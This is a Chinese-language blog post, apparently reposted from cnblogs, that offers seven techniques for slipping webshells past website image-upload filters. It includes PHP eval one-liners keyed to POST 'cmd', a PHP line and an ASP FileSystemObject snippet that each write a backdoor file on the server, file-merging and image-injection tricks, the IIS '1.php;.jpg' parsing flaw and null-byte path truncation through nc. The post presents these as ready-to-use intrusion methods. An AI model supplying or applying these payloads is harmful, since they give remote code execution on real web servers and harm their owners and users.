• 分享上传图片shell的绕过过滤的几种方法


    一般网站图片上传功能都对文件进行过滤,防止webshell写入。但不同的程序对过滤也不一样,如何突破过滤继续上传?

    本文总结了七种方法,可以突破!

    1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php

    2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php

    3、cmd命令下copy 图片.GIF+shell.php webshell.php (php) //估计和1是同样的原理,欺骗上传webshell.php

    4、C32asm打开图片在文件末尾空一格加入代码<?php eval($_POST[cmd])?> 。(php)//填充php一句话然后上传。

    5、在4基础上改进代码<?php fputs(fopen("error.php"."w")."<?eval($_POST[cmd]);?>")?> 。(php)//同

    目录下生成error.php,提问:asp的怎么改写?

    回答:asp测试的结果是:没有权限…

    <%

    Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject")

    Set MyTextFile=MyFileObject.CreateTextFile("kafei.asp")

    MyTextFile.WriteLine("<\%eval request(chr(35))\%>")

    MyTextFile.Close

    %>

    6、IIS解析目录名漏洞1.php;.jpg (jpg) //这是文件名变量没有过滤。

    7、nc抓包改数据 //路径名和文件名没有过滤。

    //通过抓包修改上传路径通过/upload/1.asp+空格,使用软件把空格填充为00。然后nc提交获取webshell。

  • 相关阅读:
    linux集群实施与部署-----Nginx
    以太网链路聚合简单配置
    配置基于源地址的策略路由
    shell --Day 6
    ps初学--Day 1部分工具使用
    shell --Day 5
    shell ——Day 4
    shell——Day3
    shell——Day 2
    初学shell——Day1
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154692.html
Copyright © 2020-2023  润新知